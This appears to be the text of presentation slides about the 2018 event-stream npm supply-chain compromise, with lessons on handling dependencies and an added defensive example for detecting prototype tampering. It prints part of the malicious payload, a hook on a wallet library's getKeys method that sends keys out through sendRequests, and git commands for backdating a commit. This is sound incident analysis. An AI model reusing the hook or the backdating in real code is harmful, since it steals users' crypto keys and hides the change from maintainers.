Handling dependencies
November 20th, 2018
dominictarr
Event stream
2015: 16M downloads
2018: 70M downloads
Summer 2018: right9ctrl proposes to become owner
GitHub issue
Pull requests
October 28th, 2018
```sh
GIT_COMMITTER_DATE="$(date)"
git commit --amend --no-edit --date "$(date)"
```
What does it do?
Update of
index.min.js
Add AES256 encrypted file shown as a test fixture
Update version number 3.3.5 -> 3.3.6
Triggers update for ~1.5-2M developers
November 20th, 2018
How does it work?
Looks for BitPay wallets with a device object (browsers/Electron)
Parses ids
Takes all wallets > 100 bitcoins (~600K€)
Sends it to a Malaysian server
```js
Credentials.prototype.getKeys = function(password) {
  // code to decrypt password and send it
  return keys;
};
```
```js
const Credentials = require("bitcore-wallet-client/lib/credentials.js");

// Intercept the getKeys function in the Credentials class
Credentials.prototype.getKeysFunc = Credentials.prototype.getKeys;
Credentials.prototype.getKeys = function(keyLookup) {
  // Call the real method first so the wallet keeps working normally
  const originalResult = this.getKeysFunc(keyLookup);
  try {
    if (global.CSSMap && global.CSSMap[this.xPubKey]) {
      delete global.CSSMap[this.xPubKey];
      sendRequests("p", keyLookup + "\t" + this.xPubKey);
    }
  } catch (err) {}
  return originalResult;
};
```
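As an added illustration (not code from the talk, and not from bitcore-wallet-client or the event-stream payload), here is how an application can notice that a prototype method such as `getKeys` has been swapped for a wrapper, and how freezing the prototype blocks the swap. `Credentials` below is a constructed stand-in for the real class, and `simulateWrap` installs a transparent wrapper with no side channel, to show that the wrapped method returns exactly the original result and so cannot be caught by checking output alone.

```javascript
// Added example, not part of the talk: detecting or blocking the
// prototype swap that the event-stream payload performed on
// bitcore-wallet-client's Credentials.prototype.getKeys.

// Constructed stand-in for the real Credentials class (assumption).
function makeCredentials() {
  function Credentials(xPubKey) { this.xPubKey = xPubKey; }
  Credentials.prototype.getKeys = function (password) {
    // Placeholder for the real key derivation.
    return { xPubKey: this.xPubKey, unlockedWith: password };
  };
  return Credentials;
}

// Record the function references we expect to stay untouched.
function snapshotPrototype(ctor, names) {
  const snap = new Map();
  for (const name of names) snap.set(name, ctor.prototype[name]);
  return snap;
}

// Return the names of methods whose reference differs from the snapshot.
// A monkey-patch replaces the reference even when the wrapper is transparent.
function findTamperedMethods(ctor, snap) {
  const tampered = [];
  for (const [name, fn] of snap) {
    if (ctor.prototype[name] !== fn) tampered.push(name);
  }
  return tampered;
}

// Freezing the prototype makes later assignments fail: silently in sloppy
// mode, with a TypeError in strict mode.
function lockPrototype(ctor) {
  Object.freeze(ctor.prototype);
  return Object.isFrozen(ctor.prototype);
}

// Transparent wrapper in the style of the payload (no side channel here):
// calls the original and returns its result unchanged.
function simulateWrap(ctor) {
  const original = ctor.prototype.getKeys;
  ctor.prototype.getKeys = function (password) {
    return original.call(this, password);
  };
}

function demo() {
  const Creds = makeCredentials();
  const snap = snapshotPrototype(Creds, ["getKeys"]);
  const wallet = new Creds("xpub-constructed");
  const before = findTamperedMethods(Creds, snap);
  const outputBefore = JSON.stringify(wallet.getKeys("pw"));

  simulateWrap(Creds);
  const after = findTamperedMethods(Creds, snap);
  const outputAfter = JSON.stringify(wallet.getKeys("pw"));

  // Second class: freeze before any wrapper can be installed.
  const Locked = makeCredentials();
  const originalGetKeys = Locked.prototype.getKeys;
  lockPrototype(Locked);
  try { simulateWrap(Locked); } catch (err) { /* strict mode: TypeError */ }
  const patchBlocked = Locked.prototype.getKeys === originalGetKeys;

  return {
    before,                                        // []
    after,                                         // ["getKeys"]
    outputUnchanged: outputBefore === outputAfter, // true: output alone misses it
    patchBlocked,                                  // true
  };
}

console.log(demo());
```

The reference comparison is cheap enough to run at startup and again before any sensitive operation; freezing is the stronger option but must happen before untrusted modules load, since `require` order decides who touches the prototype first.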
Consequences
BitPay says their app is not vulnerable, but updates it anyway
NPM takes control to remove malicious code
Developer apologizes, but had grown tired of the project and its community
Conclusion
Be careful of dependencies you add
Look at its license: MIT = NO WARRANTY
Keep your dependencies up to date
Use the GitHub Security tab
Links
Je suis un dev
GitHub Security features